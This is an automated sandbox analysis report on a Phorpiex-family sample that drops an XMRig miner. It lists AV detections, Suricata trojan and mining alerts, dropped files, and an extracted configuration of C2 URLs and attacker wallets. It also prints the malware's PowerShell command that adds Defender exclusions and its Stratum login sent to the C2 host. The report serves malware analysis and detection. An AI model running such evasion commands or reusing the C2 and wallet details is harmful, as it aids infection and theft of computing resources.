                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 2440, ProcessName: powershell.exe

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:28.995994+020020220501A Network Trojan was detected185.215.113.6680192.168.2.849704TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:29.306772+020020220511A Network Trojan was detected185.215.113.6680192.168.2.849704TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:40.632179+020020440771A Network Trojan was detected192.168.2.86289290.156.162.7240500UDP
                                2024-10-26T07:26:45.664796+020020440771A Network Trojan was detected192.168.2.86289289.218.184.4240500UDP
                                2024-10-26T07:26:50.678122+020020440771A Network Trojan was detected192.168.2.86289246.100.182.16740500UDP
                                2024-10-26T07:26:55.678177+020020440771A Network Trojan was detected192.168.2.86289294.230.236.6340500UDP
                                2024-10-26T07:27:00.678302+020020440771A Network Trojan was detected192.168.2.862892117.236.188.17740500UDP
                                2024-10-26T07:27:05.699436+020020440771A Network Trojan was detected192.168.2.86289292.46.228.24640500UDP
                                2024-10-26T07:27:10.693866+020020440771A Network Trojan was detected192.168.2.86289294.230.235.14040500UDP
                                2024-10-26T07:27:15.695331+020020440771A Network Trojan was detected192.168.2.862892198.163.192.1640500UDP
                                2024-10-26T07:27:40.776669+020020440771A Network Trojan was detected192.168.2.86289295.58.91.7040500UDP
                                2024-10-26T07:27:45.790840+020020440771A Network Trojan was detected192.168.2.86289290.156.160.8640500UDP
                                2024-10-26T07:27:50.787679+020020440771A Network Trojan was detected192.168.2.862892187.133.73.540500UDP
                                2024-10-26T07:27:55.828945+020020440771A Network Trojan was detected192.168.2.86289295.56.76.1040500UDP
                                2024-10-26T07:28:00.840057+020020440771A Network Trojan was detected192.168.2.8628925.232.31.24240500UDP
                                2024-10-26T07:28:10.868047+020020440771A Network Trojan was detected192.168.2.8628925.133.123.15940500UDP
                                2024-10-26T07:28:15.884666+020020440771A Network Trojan was detected192.168.2.86289292.46.174.25440500UDP
                                2024-10-26T07:28:20.890779+020020440771A Network Trojan was detected192.168.2.8628925.202.213.16740500UDP
                                2024-10-26T07:28:25.992217+020020440771A Network Trojan was detected192.168.2.862892217.30.162.16140500UDP
                                2024-10-26T07:28:31.006559+020020440771A Network Trojan was detected192.168.2.862892151.232.255.7340500UDP
                                2024-10-26T07:28:41.024175+020020440771A Network Trojan was detected192.168.2.862892178.88.95.3340500UDP
                                2024-10-26T07:28:46.037520+020020440771A Network Trojan was detected192.168.2.862892213.206.45.14740500UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:21.520017+020028269302Crypto Currency Mining Activity Detected192.168.2.854399185.215.113.665152TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:38.661961+020028032742Potentially Bad Traffic192.168.2.849705185.215.113.6680TCP
                                2024-10-26T07:26:40.654240+020028032742Potentially Bad Traffic192.168.2.849707185.215.113.6680TCP
                                2024-10-26T07:26:46.377835+020028032742Potentially Bad Traffic192.168.2.849714185.215.113.6680TCP
                                2024-10-26T07:26:48.595033+020028032742Potentially Bad Traffic192.168.2.858707185.215.113.6680TCP
                                2024-10-26T07:26:55.044885+020028032742Potentially Bad Traffic192.168.2.858707185.215.113.6680TCP
                                2024-10-26T07:26:56.990263+020028032742Potentially Bad Traffic192.168.2.858709185.215.113.6680TCP
                                2024-10-26T07:27:03.825632+020028032742Potentially Bad Traffic192.168.2.858709185.215.113.6680TCP
                                2024-10-26T07:27:05.767442+020028032742Potentially Bad Traffic192.168.2.854297185.215.113.6680TCP
                                2024-10-26T07:27:11.869662+020028032742Potentially Bad Traffic192.168.2.854299185.215.113.8480TCP
                                2024-10-26T07:27:12.172288+020028032742Potentially Bad Traffic192.168.2.854297185.215.113.6680TCP
                                2024-10-26T07:27:14.105430+020028032742Potentially Bad Traffic192.168.2.854300185.215.113.6680TCP
                                2024-10-26T07:27:20.555835+020028032742Potentially Bad Traffic192.168.2.85430291.202.233.14180TCP
                                2024-10-26T07:27:22.508145+020028032742Potentially Bad Traffic192.168.2.85430391.202.233.14180TCP
                                2024-10-26T07:27:24.810131+020028032742Potentially Bad Traffic192.168.2.85430391.202.233.14180TCP
                                2024-10-26T07:27:27.108194+020028032742Potentially Bad Traffic192.168.2.85430391.202.233.14180TCP
                                2024-10-26T07:27:29.404932+020028032742Potentially Bad Traffic192.168.2.85430391.202.233.14180TCP
                                2024-10-26T07:27:31.702449+020028032742Potentially Bad Traffic192.168.2.85430391.202.233.14180TCP
                                2024-10-26T07:27:35.879739+020028032742Potentially Bad Traffic192.168.2.854306185.215.113.6680TCP
                                2024-10-26T07:27:38.842455+020028032742Potentially Bad Traffic192.168.2.854325185.215.113.6680TCP
                                2024-10-26T07:27:41.790574+020028032742Potentially Bad Traffic192.168.2.854341185.215.113.6680TCP
                                2024-10-26T07:27:44.737359+020028032742Potentially Bad Traffic192.168.2.854356185.215.113.6680TCP
                                2024-10-26T07:27:47.675542+020028032742Potentially Bad Traffic192.168.2.854376185.215.113.6680TCP
                                2024-10-26T07:27:51.645899+020028032742Potentially Bad Traffic192.168.2.85439391.202.233.14180TCP
                                2024-10-26T07:27:54.578349+020028032742Potentially Bad Traffic192.168.2.85441491.202.233.14180TCP
                                2024-10-26T07:27:57.578878+020028032742Potentially Bad Traffic192.168.2.85443191.202.233.14180TCP
                                2024-10-26T07:28:00.635363+020028032742Potentially Bad Traffic192.168.2.85444891.202.233.14180TCP
                                2024-10-26T07:28:04.987175+020028032742Potentially Bad Traffic192.168.2.85446491.202.233.14180TCP
                                2024-10-26T07:28:09.167543+020028032742Potentially Bad Traffic192.168.2.854494185.215.113.6680TCP
                                2024-10-26T07:28:12.147710+020028032742Potentially Bad Traffic192.168.2.854513185.215.113.6680TCP
                                2024-10-26T07:28:16.100049+020028032742Potentially Bad Traffic192.168.2.854530185.215.113.6680TCP
                                2024-10-26T07:28:19.587861+020028032742Potentially Bad Traffic192.168.2.854551185.215.113.6680TCP
                                2024-10-26T07:28:22.823567+020028032742Potentially Bad Traffic192.168.2.854568185.215.113.6680TCP
                                2024-10-26T07:28:26.988232+020028032742Potentially Bad Traffic192.168.2.85458791.202.233.14180TCP
                                2024-10-26T07:28:30.262759+020028032742Potentially Bad Traffic192.168.2.85459791.202.233.14180TCP
                                2024-10-26T07:28:33.292933+020028032742Potentially Bad Traffic192.168.2.85459991.202.233.14180TCP
                                2024-10-26T07:28:36.304279+020028032742Potentially Bad Traffic192.168.2.85460191.202.233.14180TCP
                                2024-10-26T07:28:39.350098+020028032742Potentially Bad Traffic192.168.2.85460291.202.233.14180TCP
                                2024-10-26T07:28:43.541218+020028032742Potentially Bad Traffic192.168.2.854604185.215.113.6680TCP
                                2024-10-26T07:28:46.521796+020028032742Potentially Bad Traffic192.168.2.854606185.215.113.6680TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:21.520017+020028376771A Network Trojan was detected185.215.113.6680192.168.2.849705TCP
                                2024-10-26T07:26:21.520017+020028376771A Network Trojan was detected185.215.113.6680192.168.2.854604TCP
                                2024-10-26T07:26:21.520017+020028376771A Network Trojan was detected185.215.113.6680192.168.2.854306TCP
                                2024-10-26T07:26:21.520017+020028376771A Network Trojan was detected185.215.113.6680192.168.2.854494TCP
                                2024-10-26T07:26:40.970136+020028376771A Network Trojan was detected185.215.113.6680192.168.2.849707TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-26T07:26:38.661961+020028482951A Network Trojan was detected192.168.2.849705185.215.113.6680TCP
                                2024-10-26T07:26:40.654240+020028482951A Network Trojan was detected192.168.2.849707185.215.113.6680TCP
                                2024-10-26T07:26:46.377835+020028482951A Network Trojan was detected192.168.2.849714185.215.113.6680TCP
                                2024-10-26T07:26:48.595033+020028482951A Network Trojan was detected192.168.2.858707185.215.113.6680TCP
                                2024-10-26T07:26:55.044885+020028482951A Network Trojan was detected192.168.2.858707185.215.113.6680TCP
                                2024-10-26T07:26:56.990263+020028482951A Network Trojan was detected192.168.2.858709185.215.113.6680TCP
                                2024-10-26T07:27:03.825632+020028482951A Network Trojan was detected192.168.2.858709185.215.113.6680TCP
                                2024-10-26T07:27:05.767442+020028482951A Network Trojan was detected192.168.2.854297185.215.113.6680TCP
                                2024-10-26T07:27:12.172288+020028482951A Network Trojan was detected192.168.2.854297185.215.113.6680TCP
                                2024-10-26T07:27:14.105430+020028482951A Network Trojan was detected192.168.2.854300185.215.113.6680TCP
                                2024-10-26T07:27:22.508145+020028482951A Network Trojan was detected192.168.2.85430391.202.233.14180TCP
                                2024-10-26T07:27:24.810131+020028482951A Network Trojan was detected192.168.2.85430391.202.233.14180TCP
                                2024-10-26T07:27:27.108194+020028482951A Network Trojan was detected192.168.2.85430391.202.233.14180TCP
                                2024-10-26T07:27:29.404932+020028482951A Network Trojan was detected192.168.2.85430391.202.233.14180TCP
                                2024-10-26T07:27:31.702449+020028482951A Network Trojan was detected192.168.2.85430391.202.233.14180TCP
                                2024-10-26T07:27:35.879739+020028482951A Network Trojan was detected192.168.2.854306185.215.113.6680TCP
                                2024-10-26T07:27:38.842455+020028482951A Network Trojan was detected192.168.2.854325185.215.113.6680TCP
                                2024-10-26T07:27:41.790574+020028482951A Network Trojan was detected192.168.2.854341185.215.113.6680TCP
                                2024-10-26T07:27:44.737359+020028482951A Network Trojan was detected192.168.2.854356185.215.113.6680TCP
                                2024-10-26T07:27:47.675542+020028482951A Network Trojan was detected192.168.2.854376185.215.113.6680TCP
                                2024-10-26T07:27:51.645899+020028482951A Network Trojan was detected192.168.2.85439391.202.233.14180TCP
                                2024-10-26T07:27:54.578349+020028482951A Network Trojan was detected192.168.2.85441491.202.233.14180TCP
                                2024-10-26T07:27:57.578878+020028482951A Network Trojan was detected192.168.2.85443191.202.233.14180TCP
                                2024-10-26T07:28:00.635363+020028482951A Network Trojan was detected192.168.2.85444891.202.233.14180TCP
                                2024-10-26T07:28:04.987175+020028482951A Network Trojan was detected192.168.2.85446491.202.233.14180TCP
                                2024-10-26T07:28:09.167543+020028482951A Network Trojan was detected192.168.2.854494185.215.113.6680TCP
                                2024-10-26T07:28:12.147710+020028482951A Network Trojan was detected192.168.2.854513185.215.113.6680TCP
                                2024-10-26T07:28:16.100049+020028482951A Network Trojan was detected192.168.2.854530185.215.113.6680TCP
                                2024-10-26T07:28:19.587861+020028482951A Network Trojan was detected192.168.2.854551185.215.113.6680TCP
                                2024-10-26T07:28:22.823567+020028482951A Network Trojan was detected192.168.2.854568185.215.113.6680TCP
                                2024-10-26T07:28:26.988232+020028482951A Network Trojan was detected192.168.2.85458791.202.233.14180TCP
                                2024-10-26T07:28:30.262759+020028482951A Network Trojan was detected192.168.2.85459791.202.233.14180TCP
                                2024-10-26T07:28:33.292933+020028482951A Network Trojan was detected192.168.2.85459991.202.233.14180TCP
                                2024-10-26T07:28:36.304279+020028482951A Network Trojan was detected192.168.2.85460191.202.233.14180TCP
                                2024-10-26T07:28:39.350098+020028482951A Network Trojan was detected192.168.2.85460291.202.233.14180TCP
                                2024-10-26T07:28:43.541218+020028482951A Network Trojan was detected192.168.2.854604185.215.113.6680TCP
                                2024-10-26T07:28:46.521796+020028482951A Network Trojan was detected192.168.2.854606185.215.113.6680TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus / Scanner detection for submitted sample
                                Source: lJ4EzPSKMj.exeAvira: detected
                                Antivirus detection for dropped file
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeAvira: detection malicious, Label: WORM/Phorpiex.olrti
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nxmr[1].exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                                Source: C:\Users\user\AppData\Local\Temp\1428024550.exeAvira: detection malicious, Label: HEUR/AGEN.1329646
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                                Source: C:\Windows\sysppvrdnvs.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                                Source: C:\Users\user\AppData\Local\Temp\2573513776.exeAvira: detection malicious, Label: TR/Dldr.Agent.daypt
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrAvira: detection malicious, Label: HEUR/AGEN.1315882
                                Found malware configuration
                                Source: 4.0.sysppvrdnvs.exe.400000.0.unpackMalware Configuration Extractor: Phorpiex {"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exeReversingLabs: Detection: 81%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nxmr[1].exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\1428024550.exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeReversingLabs: Detection: 55%
                                Source: C:\Users\user\AppData\Local\Temp\2573513776.exeReversingLabs: Detection: 57%
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeReversingLabs: Detection: 76%
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeReversingLabs: Detection: 75%
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrReversingLabs: Detection: 81%
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpReversingLabs: Detection: 70%
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeReversingLabs: Detection: 76%
                                Source: C:\Windows\sysppvrdnvs.exeReversingLabs: Detection: 81%
                                Multi AV Scanner detection for submitted file
                                Source: lJ4EzPSKMj.exeReversingLabs: Detection: 71%
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nxmr[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1428024550.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeJoe Sandbox ML: detected
                                Source: C:\Windows\sysppvrdnvs.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_0040C830
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,4_2_0040C830
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,17_2_0040C830

                                Phishing

                                barindex
                                Yara detected Phorpiex
                                Source: Yara matchFile source: 4.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.0.5232.scr.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.5232.scr.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000000.1653820217.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1532857494.000000000132C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: lJ4EzPSKMj.exe PID: 3780, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 5232.scr PID: 5460, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 760, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 5236, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5232.scr, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\sysppvrdnvs.exe, type: DROPPED

                                Bitcoin Miner

                                barindex
                                Yara detected Xmrig cryptocurrency miner
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 35.2.winupsecvmgr.exe.7ff668820320.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.winupsecvmgr.exe.7ff668820320.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.winupsecvmgr.exe.7ff66881ca40.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.winupsecvmgr.exe.7ff6687e0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000029.00000002.2908746013.000002595CEF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000003.2355184537.000002595CF00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: winupsecvmgr.exe PID: 6108, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPED
                                Detected Stratum mining protocol
                                Source: global trafficTCP traffic: 192.168.2.8:54399 -> 185.215.113.66:5152 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"47feq5mtn8mcl91sadm6ooigyfkddgftchftudhdqloyz4kps7jg19n1ua8eswuzometjqqkkkzr6nmcbuwa3htua2dee6e","pass":"x","agent":"xmrig/6.19.0 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
                                Found strings related to Crypto-Mining
                                Source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: losestratum+tcp://
                                Source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: cryptonight/0
                                Source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: losestratum+tcp://
                                Source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                                Source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                                Source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                                Source: lJ4EzPSKMj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                                Source: lJ4EzPSKMj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: winupsecvmgr.exe, 00000023.00000002.2359328293.00007FF6687FB000.00000004.00000001.01000000.00000010.sdmp
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,3_2_004068E0
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrCode function: 3_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_004067A0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_004068E0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_004067A0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,17_2_004068E0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_004067A0

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
